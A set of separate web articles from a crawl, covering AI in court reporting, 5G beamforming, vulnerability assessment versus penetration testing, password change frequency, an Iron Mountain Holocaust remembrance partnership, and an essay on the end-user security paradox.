As with many other jobs being augmented by AI, court reporters will work alongside automated technology, rather than be displaced by it. As automated services transcribe proceedings in real time, court reporters will take on key roles such as taking detailed notes and clarifying key elements, including illegible sounds, names and phrases that are difficult to spell or pronounce.
2. It’s hardly new.
While digital court technology has been receiving more attention amid reporter shortages and growing adoption in recent years, its arrival on the scene dates back more than a quarter century.
Thanks to communication access real time translation (CART) technology, Camille Jones was the first person with hearing loss to sit on a jury in a Los Angeles County Superior Court in 1995. The application of CART was still new at the time, and the equipment was a bit heavy to lug around, but it nevertheless revolutionized the courtroom experience for Camille and others with hearing impairments.
In 1996, Government Technology reported on how audio and video recordings, along with computer-assisted transcription, were “changing the job of court reporters” in court systems burdened by high caseloads and tight budgets.
Today, while these technologies still exist, they have evolved tremendously to offer seamless courtroom integration, as well as significantly greater accuracy and speed.
3. Speed is the name of the game.
Court reporters are renowned for their incredibly fast typing skills. With AI at their side, transcription can be even faster – up to 30% faster. Given the formidable bottlenecks courts are currently facing, that’s a considerable rise.
4. More states are getting on board.
When the state of South Carolina was facing a severe shortage of court reporters two years ago, the state not only stepped up hiring and training, but partnered with a state community college to train people to work alongside digital court reporting services.
“Today, with a significant number of our court reporters being able to capture the record using more than one method, we are able to ensure that all scheduled terms of court may proceed and that the record of those proceedings is captured,” Ginny Jones of the South Carolina Court Administration told the Greenville News.
New York has similarly committed to training its court reporters to work alongside digital reporting technology, paving the way toward a more efficient future which combines Artificial Intelligence with irreplaceable human skills.
Digital court reporting
What was true when the first stenographers began their work holds true today: Court reporters fill vital functions in the legal system, and they’ll continue to do so. By enhancing their work with the latest technology – as is happening in countless other fields – court reporters will have the tools and resources that they need to do their jobs with even greater accuracy, efficiency, and bandwidth. | <urn:uuid:feefdc43-1848-4f78-b97e-290a43c8edf9> | CC-MAIN-2024-38 | https://coruzant.com/digital-strategy/4-things-to-know-about-the-future-of-digital-court-reporting/ | 2024-09-17T18:20:48Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651829.57/warc/CC-MAIN-20240917172631-20240917202631-00592.warc.gz | en | 0.960836 | 813 | 2.6875 | 3 |
This blog post is part of a series called “CommScope Definitions” in which we will explain common terms in communications network infrastructure.
For next-generation wireless networks such as 5G, beamforming is an important feature of base station antennas. Beamforming has been used for decades, predominantly in military radar, jammer and satellite applications to achieve a highly directive antenna beam that is electrically steerable. A steered beam was often achieved using a rotatable reflector antenna as is commonly seen in airport and marine radars or radio astronomy antennas. Yet, mechanically steered antennas have several disadvantages, such as mechanical joints that have limited life due to wear, fragile rotating RF joints to guide the transmitted/received energy to the radio, relatively slow re-steering times, and non-random access to specific pointing angles.
Electronic scanning arrays circumvent these limitations by providing an antenna array that is fixed in its position with no moving parts. Its antenna pattern is steered electrically rather than mechanically. In previous mobile wireless generations, mechanically steered arrays were not viable due to the limitations mentioned, and electrically steered arrays were considered impractical due to the intense signal processing capability required.
As silicon densities and speeds have increased at an exponential rate over the past decades, it is now feasible to implement electrically steered beamforming in mobile networks—and even user equipment— at a viable price point. For next-generation mobile communication networks, electrical beamforming is now considered a vital feature in order to meet the required data rates and network capacity, to achieve sufficient coverage using higher frequency band with higher path losses, and to better manage interference.
CLICK TO TWEET: CommScope's Mike Brobston explains 5G beamforming.
Use of beamforming in mobile networks offers several advantages over the sectorized antenna patterns used in previous and current mobile wireless generations. In these networks, base stations broadcast the channel resources designated for a specific user over the full sector, so only a very small percentage of the power is radiated in the direction of the intended user. With beamforming, the use of a directive beam focuses the transmitted signal strength and receiver sensitivity in the direction of the intended wireless link, increasing the range of the link and the available throughput to a given mobile user.
The other significant benefit is that use of a directive antenna beam reduces interference to other mobile users by minimizing radiation in directions other than the intended mobile user. This allows the same wireless spectral resources to be used for multiple, simultaneous links within a sector with manageable interference levels.
A beamforming antenna array is generally comprised of many individual antenna elements or sub-arrays. Each element or sub-array of elements is connected to an individual transmitter/receiver channel. The more elements that are arrayed generally results in a narrower beam and higher gain at the peak of the beam. Since each antenna element is transmitting or receiving the signal, the signal transmitted or received from some angles will add in-phase as the channels are combined, whereas signals from other angles will subtract and thereby cancel each other.
The carrier frequency radiated by each element of the array combines either constructively or destructively across various angles to form peaks and nulls in the antenna beam. If the delay through each channel is equal, then the peak of the antenna beam will point directly perpendicular to the array, otherwise known as the boresight angle. By progressively increasing the electrical delay across the elements of the array, the peak of the antenna beam is positioned at an angle that is offset from boresight. Therefore, by carefully controlling the relative electrical delay through each transmitter/receiver path to each of the antenna elements, the antenna beam can effectively be electrically steered across a wide angular range. Using advanced acquisition and tracking algorithms, the angle for each mobile user is determined and tracked to ensure the user receives the strongest signal with minimum interference.
Advances in semiconductor process technology have enabled the implementation of dozens of transmitter/receiver channels and many megaflops of processing capability within relatively small and low power electrical components. This has in turn brought the use of advantageous techniques such as beamforming within reach of mobile wireless networks and low-cost mobile devices to greatly enhance the mobile experience of future network users and address the ever-increasing demands for wireless throughput and capacity. | <urn:uuid:70e7898d-2eda-4b49-9d67-6290abf93ed0> | CC-MAIN-2024-38 | https://www.commscope.com/Blog/CommScope-Definitions--What-is-5G-beamforming/ | 2024-09-17T19:11:22Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651829.57/warc/CC-MAIN-20240917172631-20240917202631-00592.warc.gz | en | 0.931 | 868 | 3.8125 | 4 |
Table of Contents
Identifying & mitigating vulnerabilities in systems & applications is crucial for ensuring their security & minimising the risk of cyber attacks. Vulnerabilities refer to weaknesses or flaws in software or hardware that can be exploited by attackers to gain unauthorised access, steal data or cause damage to the system.
Failing to identify & mitigate vulnerabilities can lead to serious consequences, including financial losses, reputation damage & legal liability. Furthermore, as technology advances & cyber threats become more sophisticated, the number & severity of vulnerabilities continue to increase, making it more important than ever to address them proactively.
By identifying & mitigating vulnerabilities, organisations can reduce their risk of security breaches, protect their sensitive data & safeguard their systems & applications against various threats. There are two types of testing commonly used in the field of Cyber Security to identify such potential security weaknesses: Vulnerability Assessment & Penetration Testing.
What is Vulnerability Assessment?
Vulnerability Assessment is the process of identifying, quantifying & prioritising vulnerabilities in a system, network or application. The goal of a Vulnerability Assessment is to identify weaknesses that could be exploited by attackers & to provide recommendations for addressing them before they can be exploited.
Vulnerability Assessments typically involve using automated tools to scan systems & applications for known vulnerabilities & analysing the results to determine the severity of each vulnerability. The output of a Vulnerability Assessment [VA] is typically a Report that outlines the vulnerabilities identified, their severity ratings & recommended remediation steps. This information can be used by organisations to improve their security posture by addressing vulnerabilities before they can be exploited by attackers.
Vulnerability Assessments can identify various types of vulnerabilities. Some common types of vulnerabilities that can be identified through Vulnerability Assessments include:
- Software vulnerabilities: These are flaws or weaknesses in software applications, operating systems or libraries that can be exploited by attackers. Examples include Buffer Overflow vulnerabilities, SQL Injection vulnerabilities & Cross-Site Scripting [XSS] vulnerabilities.
- Configuration vulnerabilities: These are misconfigurations or settings in systems, networks or applications that create security weaknesses. Examples include weak passwords, unsecured network services or protocols & unnecessary open ports.
- Patching vulnerabilities: These are vulnerabilities that arise from missing or outdated patches or updates for software applications, operating systems or libraries. Attackers can exploit known vulnerabilities that have not been patched, making patch management an important part of Vulnerability Assessment.
- Mobile application vulnerabilities: These are vulnerabilities that specifically affect mobile applications, such as insecure data storage, insecure communication channels & insufficient authentication & authorization.
- Network vulnerabilities: These are vulnerabilities that exist in network devices, protocols or configurations, such as misconfigured firewalls, weak encryption or unpatched network equipment.
It’s important to note that vulnerabilities can vary in severity & not all vulnerabilities pose the same level of risk. The severity of a vulnerability depends on factors such as the potential impact of exploitation, the likelihood of exploitation & the context in which the vulnerability exists.
Vulnerability Assessments offer several benefits to organisations, but they also have some limitations. Here are some of the key benefits & limitations of Vulnerability Assessment:
- Increased security: Vulnerability Assessments help organisations identify & address security weaknesses before they can be exploited by attackers.
- Compliance: Vulnerability Assessments can help organisations meet Regulatory Compliance requirements, such as those in the Payment Card Industry Data Security Standard [PCI DSS] or the General Data Protection Regulation [GDPR].
- Cost-effectiveness: Vulnerability Assessments can help in identifying & addressing vulnerabilities proactively. This can avoid costly security breaches & reduce the overall cost of security.
- Prioritisation: Vulnerability Assessments help organisations prioritise which vulnerabilities to address first based on their severity & potential impact.
- False positives & false negatives: Vulnerability Assessments can sometimes generate false positives, identifying a vulnerability that doesn’t actually exist or false negatives, failing to identify a real vulnerability. This can result in wasted resources & can cause organisations to overlook real vulnerabilities.
- Lack of context: Vulnerability Assessments can identify vulnerabilities, but they may not provide the context needed to understand the risk they pose.
- Limited scope: Vulnerability Assessments are typically limited to the systems & applications that are included in the assessment. This means that vulnerabilities in other systems or applications may go unnoticed.
- Incomplete coverage: Vulnerability Assessments may not cover all possible attack vectors or all types of vulnerabilities. This means that an Organisation may need to supplement Vulnerability Assessments with other security measures, such as Penetration Testing [PT] or Threat Modelling.
What is Penetration Testing?
Penetration Testing [PT], also known as Pen-Testing, is a method of evaluating the security of a system or network by simulating an attack from a malicious actor. The goal of a Penetration Test is to identify vulnerabilities in the system that could be exploited by an attacker & to provide recommendations for improving the system’s security posture.
During a Penetration Test, a trained Security Professional, known as a Penetration Tester or Ethical Hacker, will attempt to exploit vulnerabilities in the system or network using techniques similar to those used by real attackers. The tester will use a combination of automated tools & manual techniques to identify vulnerabilities, gain unauthorised access to the system & escalate privileges to gain deeper access.
Penetration Testing can identify various types of vulnerabilities in a system or network. Some common types of vulnerabilities that can be identified through Penetration Testing include:
- Wireless network vulnerabilities: These vulnerabilities may include weaknesses in wireless networks, such as weak encryption, unauthorised access points or rogue devices, that could be exploited to gain unauthorised access or intercept network traffic.
- Web application vulnerabilities: These vulnerabilities may include flaws in web applications, such as input validation issues, authentication & authorization weaknesses & SQL Injection or Cross-Site Scripting [XSS] vulnerabilities, that could be exploited to gain unauthorised access or manipulate data.
- Operating system vulnerabilities: These are vulnerabilities that can be exploited by an attacker to gain unauthorised access to an operating system.
- Social engineering vulnerabilities: These vulnerabilities may involve exploiting human factors, such as social engineering attacks, phishing or pretexting, to gain unauthorised access or manipulate users into revealing sensitive information.
- Insider threats: These vulnerabilities may involve the exploitation of insider threats, such as unauthorised access or misuse of privileges by employees, contractors or partners, that could result in unauthorised access, data breaches or other security incidents.
Penetration Testing provides several benefits to organisations, but it also has some limitations. Here are some of the key benefits & limitations of Penetration Testing:
- Identify vulnerabilities: Penetration Testing helps organisations identify vulnerabilities in their systems & applications that could be exploited by attackers.
- Improve security: By identifying vulnerabilities & addressing them, organisations can improve their overall security posture.
- Regulatory Compliance: Penetration Testing can help organisations meet Regulatory Compliance requirements, such as those in the Payment Card Industry Data Security Standard [PCI DSS] or the General Data Protection Regulation [GDPR].
- Real-world testing: Penetration Testing provides a real-world assessment of an organisation’s security posture. It helps to identify weaknesses that may not be apparent through other forms of testing, such as Vulnerability Assessments or Code Reviews.
- Cost: Penetration Testing can be expensive, especially for large or complex systems making it difficult for some organisations to afford it.
- False sense of security: Penetration Testing may give organisations a false sense of security if they believe that their systems are secure after a successful test. However, in reality, security is an ongoing process & new vulnerabilities can emerge at any time.
- Limited scope: Penetration Testing is typically focused on a specific system or application. This means that vulnerabilities in other systems or applications may go unnoticed.
- Disruption: Penetration Testing can be disruptive to business operations, especially if the test causes system downtime or other disruptions.
Vulnerability Assessment vs Penetration Testing: Key differences
Vulnerability Assessment & Penetration Testing are both important components of a comprehensive security program, but they differ in their approach & objectives.
Here are some of the main differences between Vulnerability Assessment & Penetration Testing:
- Objective: The main objective of Vulnerability Assessment is to identify vulnerabilities in a system or network, while the main objective of Penetration Testing is to identify vulnerabilities & exploit them to determine the extent to which an attacker could compromise the system.
- Methodology: Vulnerability Assessment is typically conducted using automated tools that scan for known vulnerabilities in a system or network, while Penetration Testing involves manual testing & exploitation of vulnerabilities using both automated & manual tools.
- Scope: Vulnerability Assessment typically covers a wider scope of systems & applications, while Penetration Testing is typically more targeted & focused on specific systems or applications.
- Timing: Vulnerability Assessment is typically conducted regularly, such as quarterly or annually, while Penetration Testing is usually conducted less frequently, such as once or twice a year.
- Reporting: Vulnerability Assessment typically provides a list of vulnerabilities identified along with recommendations for addressing them, while Penetration Testing provides a detailed Report that includes the methods used to identify vulnerabilities, the vulnerabilities identified, Proof of Concept [PoC] for each vulnerability that is identified & recommendations for addressing them.
- Cost: Vulnerability Assessment is generally less expensive than Penetration Testing since it relies primarily on automated tools & requires less manual effort.
Vulnerability Assessment vs Penetration Testing: Which is better?
Both Vulnerability Assessment & Penetration Testing are important testing methods that play a critical role in identifying & mitigating security risks in systems & networks. Each method has its advantages & disadvantages & the choice between them depends on the organisation’s specific needs & goals.
Vulnerability Assessment is typically more appropriate than Penetration Testing in the following situations:
- Regular Security Assessments: Vulnerability Assessment is a cost-effective way to conduct regular Security Assessments, as it can be automated & scaled to cover a wide range of systems & applications.
- Compliance requirements: Many Compliance Frameworks require regular Vulnerability Assessments, making them a necessary part of Compliance efforts.
- Risk management: Vulnerability Assessment can help organisations identify potential security risks & prioritise remediation efforts based on the severity & impact of identified vulnerabilities.
- Limited resources: Vulnerability Assessment requires less specialised skills & expertise than Penetration Testing, making it more accessible to organisations with limited resources.
Penetration Testing is typically more appropriate than Vulnerability Assessment in the following situations:
- Testing specific controls: Penetration Testing is a more targeted approach that can be used to test specific security controls, such as firewalls, intrusion detection systems & access controls.
- Real-world simulation: Penetration Testing provides a more realistic simulation of an attacker’s attempt to exploit vulnerabilities, providing valuable insights into the effectiveness of an organisation’s security controls & incident response processes.
- Prioritised testing: Penetration Testing can be focused on high-value assets, enabling organisations to prioritise testing efforts based on the risk profile of specific systems & applications.
- Validating vulnerabilities: Penetration Testing can be used to validate vulnerabilities identified through a Vulnerability Assessment, ensuring that identified vulnerabilities are not false positives & providing additional context around the severity & impact of identified vulnerabilities.
Vulnerability Assessment vs Penetration Testing: When to conduct?
Organisations should conduct both Vulnerability Assessment & Penetration Testing [VAPT] as part of their overall security testing strategy. The specific timing of these assessments will depend on a variety of factors, including the organisation’s risk profile, compliance requirements & budget.
Vulnerability Assessment should be conducted regularly, typically quarterly or annually, to identify potential vulnerabilities in an organisation’s systems & applications. In addition, Vulnerability Assessment should be conducted whenever new systems or applications are introduced or significant changes are made to existing systems or applications. This helps to ensure that vulnerabilities are identified & addressed on time, reducing the risk of a successful cyberattack.
Penetration Testing, on the other hand, is typically conducted less frequently, often once per year or on an as-needed basis. Penetration Testing should be conducted when an organisation wants to validate the effectiveness of its security controls or when there is a specific concern or risk that needs to be addressed. Penetration Testing can also be conducted as part of a red team exercise, where a team of ethical hackers attempts to simulate a real-world attack on an organisation’s systems & applications.
Vulnerability Assessment & Penetration Testing are two essential security testing methods used to identify & mitigate vulnerabilities in systems & applications. Vulnerability Assessments are typically automated scans that identify vulnerabilities & provide information on how to address them. Penetration Testing involves attempting to exploit vulnerabilities to identify weaknesses in security controls & provide recommendations for remediation.
When choosing between Vulnerability Assessment & Penetration Testing, it’s important to consider the specific needs of your organisation. Vulnerability Assessments are generally more automated & provide a broad overview of potential vulnerabilities, while Penetration Testing is more focused & provides a deeper analysis of specific vulnerabilities. Vulnerability Assessments are typically conducted more frequently, while Penetration Testing is typically conducted periodically.
What is the difference between Vulnerability Assessment & Penetration Testing?
Vulnerability Assessment & Penetration Testing are two distinct security testing methods used to identify & address vulnerabilities in systems & applications. Vulnerability Assessment involves using automated tools to scan for vulnerabilities in a system, network or application. It provides a broad overview of potential vulnerabilities, their severity & recommendations for remediation.
Penetration Testing involves attempting to exploit identified vulnerabilities to test the effectiveness of security controls & identify weaknesses that could be exploited by malicious actors. It provides a more in-depth analysis of specific vulnerabilities & their potential impact.
Which is better: Vulnerability Assessment or Penetration Testing?
Neither Vulnerability Assessment nor Penetration Testing is inherently better than the other, as they serve different purposes & have different scopes. Vulnerability Assessment is more automated & provides a broad overview of potential vulnerabilities, making it suitable for regular scans & identifying vulnerabilities in a wide range of systems & applications. On the other hand, Penetration Testing is more focused & involves actively attempting to exploit identified vulnerabilities to assess the effectiveness of security controls, making it suitable for targeted testing & providing in-depth analysis of specific vulnerabilities. The choice between Vulnerability Assessment & Penetration Testing depends on the organisation’s requirements. | <urn:uuid:a2ab66d5-885a-4306-87b1-f19d42e2018a> | CC-MAIN-2024-38 | https://www.neumetric.com/vulnerability-assessment-vs-penetration-testing/ | 2024-09-17T19:51:15Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651829.57/warc/CC-MAIN-20240917172631-20240917202631-00592.warc.gz | en | 0.921719 | 3,011 | 3.78125 | 4 |
Data breaches are becoming an increasingly devastating problem in the USA, with the number of data breaches increasing from 30.9 million to 96.7 million from 2022 to 2023. That is an alarming statistic, and it presents an ever-growing concern that your personal and financial information is at risk of theft.
- Key Takeaways
- Understanding the Importance of Regular Password Changes
- Factors Influencing How Often You Should Change Your Passwords
- Recommended Frequency for Changing Personal Passwords
- Best Practices in Creating and Managing Passwords
- Responding to Security Breaches and Compromised Passwords
- Educating Others on Password Security
- How Often Should Personal Passwords be Changed – Frequently Asked Questions
With these kinds of data breaches, identity theft is also increasing in frequency and severity, having more than tripled between 2019 and 2021 alone. These numbers illustrate why identity theft protection is so important!
Perhaps the most striking statistic here is that nearly 80% of all data breaches that occur happen due to stolen or weak passwords. No matter the account type in question, your password is your number one line of defense against hackers and thieves.
However, having a single password for all of your accounts is a major risk, as is using the same passwords for months or years on end.
This begs the question of how often personal passwords should be changed, or if they should be changed at all. Let’s determine exactly how your passwords protect you, the risks associated with not changing them, and how often they should be changed.
- Thanks to the increasing number of data breaches in the USA, there is a growing need for robust online security practices.
- One of the best ways to keep your personal and financial information secure is to regularly change your passwords.
- Changing your password frequently, or not at all, poses various risks, and there is a recommended frequency for changing personal passwords.
Understanding the Importance of Regular Password Changes
Changing your password isn’t just about coming up with a cool new phrase to type into the password field every time you log into an account, rather it’s a primary line of defense to keep you protected from thieves and hackers.
The Role of Passwords in Online Security
As far as your personal accounts are concerned, your password is the first line of defense you have against infiltration. It’s about keeping your confidential information secure and safe.
Not only are passwords designed to protect your data, but also to authenticate your identity, or in other words to ensure that only authorized people are accessing the accounts in question.
Passwords determine who can and cannot access your accounts, whether social media, banking accounts, or anything in between.
Risks of Infrequent Password Changes
There are many risks associated with infrequent password changes, mainly that someone will eventually figure out what your password is. If someone is actively trying to hack into one of your accounts, the older your password is, the likelier a hacker is to guess it, quite simply because they have more time to do so.
The longer you give thieves the opportunity to determine your password, the higher the chances of your accounts being breached. This is especially the case if you happen to use the same password for multiple accounts.
If a hacker figures out your password for one account, they’ve effectively figured out the password for all of them. We’re aware that we’re talking specifically about hackers here, but the reality is that this could potentially apply to friends and family members as well. You never know who’s trying to access your accounts.
Preventing Unauthorized Access with Regular Password Changes
One of the best ways to prevent unauthorized access to any of your accounts is to regularly change your passwords. The more often you change your passwords, the lower the chances of a breach occurring, particularly due to stale or old passwords.
An individual may think that they’re getting close to figuring out your password, only for you to change it to something completely different, forcing them to start at the beginning. It’s all about minimizing the window of opportunity that a cyber criminal has to breach your accounts.
Factors Influencing How Often You Should Change Your Passwords
There are quite a few factors that you’ll want to consider when it comes to how often you should change your passwords. Let’s look at a few.
Security Requirements and Account Types
The type of account in question makes a difference. For instance, if we are talking about a simple social media account, changing the password frequently may not be quite as important as changing the password for accounts that contain more sensitive information, such as personal data and financial information. The more important the information within the account, the more frequent the password changes should be.
Recent Security Threats
If you discovered that there were recent security threats, then a password should be changed right away. If you often get notified of security threats from your antivirus or antimalware systems, changing passwords regularly is beneficial.
Furthermore, if you discover that any kind of system or software you are using is prone to security breaches, then frequent password changes are recommended. The more vulnerable the system in question, the more frequent the password changes should be.
Personal vs. Professional Accounts
Depending on the organization you work for, there might be protocols in place for password changes.
There are many informational technology departments in businesses that require passwords to be changed as frequently as every 30 days, particularly those that allow for access to sensitive information.
However, if personal accounts are concerned, especially those that don’t contain any crucial financial information, the schedule may be a bit more flexible.
Recommended Frequency for Changing Personal Passwords
Depending on who you ask, passwords should be changed every three to six months. Here are some steps for you to follow about the recommended frequency for changing your personal passwords.
Step 1: Identifying High-Risk Accounts That Require More Frequent Changes
To determine how often a password should be changed, you need to determine how high-risk the account in question is. For instance, the most important ones to pay attention to are e-mail accounts and any type of financial account. These are the highest risk, followed by anything else that may contain personal information. Even social media accounts are at risk of being hacked.
Step 2: Establishing a Routine Schedule for Updating Passwords
Half the battle of changing your passwords regularly is remembering to do it in the first place, which means that you want to set yourself some kind of reminder for doing so.
There are automated systems out there designed specifically for this purpose, so you don’t have to remember yourself.
Changing all of your passwords at once however can be quite a hassle, so you may want to stagger this unless you’re using state-of-the-art password management software.
Step 3: Implementing Password Managers for Effective Management
Speaking of password managers, this is one of the best ways to ensure your online security. There are some password managers out there that allow for automatic password changes on a scheduled basis.
Furthermore, these password managers usually come with what are known as vaults where passwords are securely stored.
This means that you can create unique passwords for every account, store them in the vault, and not even have to remember them yourself. A Password manager like 1Password offers password services for individuals, families, and businesses alike. Read our 1Password review right here!
Step 4: Using Multi-factor Authentication for Enhanced Security
Multi-factor or two-factor authentication is another great way to protect your passwords, and it’s a good way to reduce the frequency at which passwords need to be changed.
Multi-factor authentication requires a second form of verification, such as a fingerprint, text message, phone call, or e-mail, besides your password alone. In fact, it’s considered one of the best ways to keep your information secure.
Step 5: Staying Informed About the Latest Security Threats and Recommendations
To keep yourself protected, staying aware of new threats is essential. Therefore, stay up to date on security news and always update your practices to stay one step ahead of thieving criminals.
Best Practices in Creating and Managing Passwords
Right now, we’re going to provide you with all of the information that you need for creating and managing passwords in such a way that will keep you and your financial information protected.
Tips for Creating Strong and Unique Passwords
The following tips for creating strong and unique passwords should help keep you protected to some degree.
- Never use any kind of personal information that can be easily accessed by hackers.
- Using a random sequence of letters and numbers, or a random sequence of words is ideal.
- Try to avoid using any kind of predictable patterns that are easy to determine.
- The longer and more complex your password is, the harder it will be to crack. You should have a mix of numbers, uppercase and lowercase letters, and symbols.
- Using a password manager in your browser is an easy way to create strong passwords.
Using Password Managers for Maintaining Password Hygiene
The fact is that one of the easiest ways to create secure passwords and to manage them is to use a password manager.
High-quality password managers provide many different services, including creating some of the most secure passwords in the world, storing them in a secure place, and automatically inserting them into password fields as required.
In case you’re looking for a good option, Dashlane is another fantastic password manager that we recommend.
Many of these password managers also have features that automatically change your sensitive passwords on a regular basis, to ensure maximum security. If you’re looking to make your life easier as far as password management is concerned, a good manager is required.
Common Mistakes to Avoid When Creating and Storing Passwords
There are some common mistakes in regard to passwords that many of us commit, but they need to be avoided at all costs.
- Never ignore the security updates on your computer or other devices.
- Do not ignore a message about a security breach from your antivirus system.
- Never keep physical records or write down your passwords where other people can find them.
- Don’t keep reusing passwords, especially not across multiple accounts.
Responding to Security Breaches and Compromised Passwords
The unfortunate reality is that security breaches and compromised passwords happen, and if they do, how severe the breach is may depend on how fast and how well you react.
Immediate Reactions to Security Breaches
What are some of the immediate reactions that you should have when there’s a security breach in one or multiple accounts?
- As soon as there is some kind of security threat or breach, immediately change your password. If you’ve used the same password for another account, change that as well, but make sure it’s different from all of your others.
- Access your security systems to see if you have any notifications of breaches in any of your other accounts.
- You should also monitor all of your accounts to see if there is any suspicious activity happening. This is especially the case as far as your banking accounts are concerned. If you notice missing money or unauthorized charges, you’ll need to contact your financial institution to take immediate action.
Considerations for Securing Accounts Post-Breach
If your account has been breached, there are a few things you should consider doing so it doesn’t happen again.
- If you haven’t already enabled two-factor or multi-factor authentication, do so immediately, as this adds an extra layer of security to your accounts.
- If you’re having trouble creating and managing your passwords, a password manager like Safe or KeePass is recommended, as this will take care of all of the hard work for you, while keeping you and your information secure.
- Always review your account permissions, because there may be third-party applications that have access to your accounts that should not.
- If the system you are using suffers from security breaches on a constant basis, consider switching providers. For instance, if you have one e-mail service that is constantly hacked, consider changing to another.
Educating Others on Password Security
Now that you’ve read everything there is to know about password change frequency, you should be an expert on it, but this doesn’t mean that the people around you are aware. Therefore, you should educate your friends and family members on password security.
Make sure that they know that long and complex passwords are best, that they should be changed frequently, and that there are applications and services out there that can assist them on this front.
Once again, if all else fails, the easiest way to keep you and your family secure is by using a password-managing service.
How Often Should Personal Passwords be Changed – Frequently Asked Questions
Let’s quickly answer some frequently asked questions about how often your passwords should be changed.
Should I Change My Password Regularly?
Yes, passwords should be changed regularly, between every three and six months depending on the type of account.
Is Not Changing Passwords Regularly a Security Risk?
The longer you go between password changes, the greater the risk that a hacker is able to crack your password and find their way into your accounts.
Should I Change My Passwords Often?
Passwords should be changed as often as the account type in question calls for. The more sensitive the information, the more often a change should occur.
What if I Forget My New Passwords Often?
If you’re someone who has trouble remembering your new passwords, the easiest solution is to use a high-quality password manager. A password manager cannot only remember your passwords for you but create high-quality ones as well.
How Often Should a Password Be Changed?
Passwords should be changed every three months.
Can Password Change Frequency Prevent All Forms of Cyber Attack?
Although changing your passwords can provide you with a great deal of protection against hackers and account breaches, it is unfortunately not able to prevent all forms of cyber-attack. | <urn:uuid:ac256bd8-cd84-4796-af2e-fc6f7f131644> | CC-MAIN-2024-38 | https://battensafe.com/resources/how-often-should-personal-passwords-be-changed/ | 2024-09-20T06:28:07Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652138.47/warc/CC-MAIN-20240920054402-20240920084402-00392.warc.gz | en | 0.943316 | 2,936 | 2.765625 | 3 |
United States Holocaust Memorial Museum and Days of Remembrance
In honor of the “Days of Remembrance,” Iron Mountain participated in the annual event on April 28-29, 2019 in Washington, DC.
The Days of Remembrance of the Victims of the Holocaust (DRVH) is an annual 8-day period designated by the United States Congress for civic commemorations and special programs that help citizens remember and draw lessons about the Holocaust. The annual DRVH period normally begins on the Sunday before the Israeli observance of Yom HaShoah, Holocaust Memorial Day, and continues through the following Sunday, usually in April or May.
A National Civic Commemoration is held in Washington, D.C., with state, city, and local ceremonies and programs held in most of the fifty states, and on U.S. military ships and stations around the world. The United States Holocaust Memorial Museum (USHMM) designates a theme for each year's programs, and provides materials to help support remembrance efforts.
Iron Mountain has a new partnership with the USHMM through our Living Legacy Initiative - our charitable commitment to preserve and make accessible historical and cultural information and assets. Iron Mountain's grant will support the discoverability and eventual digitization of archival materials from the U.S. prosecutors from the Nuremberg Trials, which helped prosecute Nazi leadership after World War II. The 300,000 pages contained post-war documentation that were essential to the war crime trials and helped set the stage for international law. The documents will serve as learning aids for years to come. Because of Iron Mountain's support for the Nuremberg Trials, we were invited to participate in the Days of Remembrance events.
The first day held an unveiling in which Iron Mountain was thanked for our financial gift and an inscription was unveiled on its wall. "It was an honor to attend the Days of Remembrance unveiling ceremony," said Theresa Pattara, VP Government Affairs. "We listened to families of survivors speak and also heard about the personal experiences of some of the newer Museum staff. I learned much about the Museum's role in not only educating new generations about the atrocities that occurred, but also its work to prevent similar ones from occurring again. I'm proud that Iron Mountain is able to support access to the Nuremburg prosecutors' records through the Living Legacy Initiative."
On the second day, Iron Mountain employees were able to attend the U.S. Capitol in Washington, DC for the National Commemoration of the Days of Remembrance. Israel's Ambassador, Ron Dermer, offered remarks and music was played by the US Army Band. "The setting was extremely powerful with Holocaust survivors in attendance," said Chris Smith, senior Vice President of Records Management. "Our Living Legacy program is a true testament of Iron Mountain's core values and I am so proud to work for a company who invests time, effort and money into worthy causes like the United States Holocaust Museum Memorial."
Since 1982, the United States Holocaust Memorial Museum (USHMM) has led the National Days of Remembrance ceremony with Holocaust survivors, members of Congress, White House officials, liberators, and community members at the U.S. Capitol.
Featured services & solutions
Iron Mountain's IT data management and protection services can help you overcome the challenges of data with lifecycle management and ensure data protection.
Iron Mountain’s Peak Moments
Information Management has changed over the years and so have we. Discover how we've adapted every step of the way in our 70-year history. | <urn:uuid:f1e7a835-7ef7-49ce-b12a-bf9e282b282a> | CC-MAIN-2024-38 | https://www.ironmountain.com/en-gb/about-us/sustainability/stories/u/united-states-holocaust-memorial-museum-and-days-of-remembrance | 2024-09-09T08:30:19Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651092.31/warc/CC-MAIN-20240909071529-20240909101529-00492.warc.gz | en | 0.955519 | 720 | 2.71875 | 3 |
Information Security Paradox
The root cause of why users still need awareness in 2006 lies behind a legacy of behavior: incorrect security habits. In computer systems, it is common to start by implementing "wide open" systems or programs and then closing them down when functionality tests show they are working. This kind of behavior is reflected in all services that are in use today. Our email addresses allow everything. In general, default configurations allow everything to pass and deny nothing. Internet browsers are wide open as well (script languages); security features for end users take only a few pixels in the bottom-right corner of Internet Explorer (where a padlock is shown). Default protocols are very open as well (for example, http, ftp, and so on). Those who create the protocols and programs should apply the famous need-to-know basis in their work: a need-to-run basis.
Although it is understandable that the original Internet services did not carry many safety measures, it is amazing that fairly new services such as VOIP suffer from the same lack of protection. Although they are all based on the same stack of protocols, one would expect some stronger security built into these emerging tools. But on the contrary...
There is a direct relationship between the increase in Internet services for the end user and their exposure (risk of loss of confidentiality, computer compromise, and identity theft). The complexity or the multiplicity of services ensures that it takes dedication to be able to run a secure Wireless LAN at home. In other words, the potential for mistakes/deliberate malicious acts increases because the numbers of available services and dependencies increase.
Additionally, when we speak about security awareness, we ask end users to take responsibility for the emails they receive, while we have removed the responsibility of system administrators to secure their own systems by implementing vulnerability scanners, integrity tools, and so on. There is a paradox here: We do not trust a system administrator with the configuration of their systems, so we implement internal port or application scanners. Yet we ask the end user, who is not an expert in information systems, to know and apply a set of good practices.
